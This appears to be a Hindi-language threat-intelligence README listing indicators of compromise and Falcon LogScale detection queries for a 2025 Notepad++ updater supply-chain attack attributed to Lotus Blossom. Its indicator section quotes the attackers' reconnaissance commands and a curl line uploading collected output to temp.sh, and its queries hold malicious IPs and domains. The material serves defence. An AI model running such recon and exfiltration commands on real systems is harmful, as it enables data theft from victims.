
Notepad++ आपूर्ति श्रृंखला हमले (CVE-2025-15556) — Lotus Blossom APT, जून–दिसंबर 2025 के लिए IoCs और डिटेक्शन नियम। इसमें Falcon LogScale क्वेरी, YARA/Sigma नियम और MITRE ATT&CK मैपिंग शामिल है।
CVE-2025-15556 | लोटस ब्लॉसम / रास्पबेरी टाइफून | जून – दिसंबर 2025
इस भंडार में Notepad++ आपूर्ति श्रृंखला हमले (जिसका खुलासा 2 फरवरी, 2026 को हुआ) से संबंधित समझौता संकेतकों (IoCs) का एक व्यापक, एकीकृत संग्रह है।
जून से दिसंबर 2025 के बीच, एक चीनी राज्य-प्रायोजित खतरा अभिनेता ने Notepad++ की होस्टिंग बुनियादी ढांचे से समझौता किया, अंतर्निहित अपडेट तंत्र (WinGUp) को हाईजैक करके लक्षित उपयोगकर्ताओं को चुनिंदा रूप से ट्रोजनाइज्ड इंस्टॉलर वितरित किए। हमले ने अपडेटर (पूर्व-8.8.9) में क्रिप्टोग्राफ़िक सत्यापन की कमी का फायदा उठाया, जिससे कस्टम बैकडोर, Cobalt Strike Beacons और Metasploit पेलोड का वितरण संभव हुआ।
| CVE | CVE-2025-15556 — अखंडता जांच के बिना कोड का डाउनलोड |
| खतरा अभिनेता | लोटस ब्लॉसम (बिलबग, रास्पबेरी टाइफून, थ्रिप) / जिर्कोनियम (वायलेट टाइफून) |
| सक्रिय अवधि | जून 2025 – 2 दिसंबर, 2025 |
| हमला वेक्टर | WinGUp ऑटो-अपडेटर के माध्यम से आपूर्ति श्रृंखला समझौता |
| लक्ष्य | सरकार, दूरसंचार, वित्तीय सेवाएं, IT प्रदाता (फिलीपींस, वियतनाम, अल साल्वाडोर, ऑस्ट्रेलिया, पूर्वी एशिया) |
| मैलवेयर | क्रिसालिस बैकडोर (कस्टम), Cobalt Strike Beacon, Metasploit Meterpreter |
| पैच किया गया | Notepad++ v8.8.9+ (प्रमाणपत्र सत्यापन) / v8.9.1+ (XMLDSig सत्यापन) |
Kaspersky GReAT ने तीन अलग-अलग संक्रमण श्रृंखलाओं की पहचान की, जिन्हें पता लगाने से बचने के लिए लगभग मासिक रूप से घुमाया गया:
GUP.exe → update.exe (NSIS) → ProShow.exe (वैध) → "load" फ़ाइल के माध्यम से शोषण
→ Metasploit डाउनलोडर → Cobalt Strike Beacon
whoami && tasklist → temp.sh के माध्यम से बाहर निकाली गई%appdata%\ProShow\GUP.exe → update.exe (NSIS) → script.exe (Lua दुभाषिया) → alien.ini (संकलित Lua)
→ EnumWindowStationsW के माध्यम से शेलकोड → Metasploit डाउनलोडर → Cobalt Strike Beacon
whoami && tasklist && systeminfo && netstat -ano%appdata%\Adobe\Scripts\GUP.exe → update.exe (NSIS) → BluetoothService.exe (वैध) → log.dll (साइडलोडेड)
→ "BluetoothService" शेलकोड को डिक्रिप्ट करता है → क्रिसालिस बैकडोर
%appdata%\Bluetooth\C:\ProgramData\USOShared\ में पाया गया ┌─────────────────────────────────────────────────────────┐
│ COMPROMISE TIMELINE │
├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
│ Jul 25 │ Aug 25 │ Sep 25 │ Oct 25 │ Nov 25 │Dec 25│
├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
Chain #1 (ProShow) │████████████████████ │
Chain #2 (Lua) │ █████████████████████████████ │
Chain #3 (DLL SL) │ ██████████████ │
Infra access │████████████████████████████████████████████████████████│
└────────────────────────────────────────────────────────┘
| फ़ाइल | विवरण |
|---|---|
notepadpp_supply_chain_iocs.csv | पूर्ण IoC डेटासेट (105 संकेतक) MITRE ATT&CK मैपिंग के साथ |
| कॉलम | विवरण |
|---|---|
ioc_type | प्रकार: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window |
ioc_value | संकेतक मान |
chain | संक्रमण श्रृंखला (1, 2, 3, 1/2, 2/3, all, n/a) |
context | IoC क्या दर्शाता है, इसका विवरण |
source | खुफिया स्रोत (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont) |
risk | गंभीरता (CRITICAL, HIGH, MEDIUM, LOW, INFO) |
mitre_technique | MITRE ATT&CK तकनीक ID |
व्यवहारिक — IoC-अज्ञेय, उच्चतम मूल्य:
gup.exe एक वैध हस्ताक्षरित Notepad++ इंस्टॉलर के अलावा कोई भी चाइल्ड प्रक्रिया बनाता हैgup.exe notepad-plus-plus.org, github.com, release-assets.githubusercontent.com के अलावा अन्य डोमेन/IP से कनेक्ट होता है%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\%localappdata%\Temp\ns.tmp\ का निर्माण (NSIS रनटाइम — सभी श्रृंखलाओं में मौजूद)नेटवर्क — उच्च विश्वास:
cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com का DNS समाधानtemp.sh (51.91.79.17) से कनेक्शन — विशेष रूप से curl के माध्यम से फ़ाइल अपलोड के साथtemp.sh URL एम्बेडेड HTTP अनुरोध45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210 पर आउटबाउंड कनेक्शनटोही कमांड (पोस्ट-एक्सप्लॉइटेशन):
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
// दुर्भावनापूर्ण IP
RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
| iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
// दुर्भावनापूर्ण डोमेन
DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
| iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
// संदिग्ध फ़ाइल नाम
ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
| iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
// संदिग्ध DLL
ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
| iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
// श्रृंखला-विशिष्ट कलाकृतियां
ImageFileName=/\\(alien\.ini|load)$/i
| iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
* | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)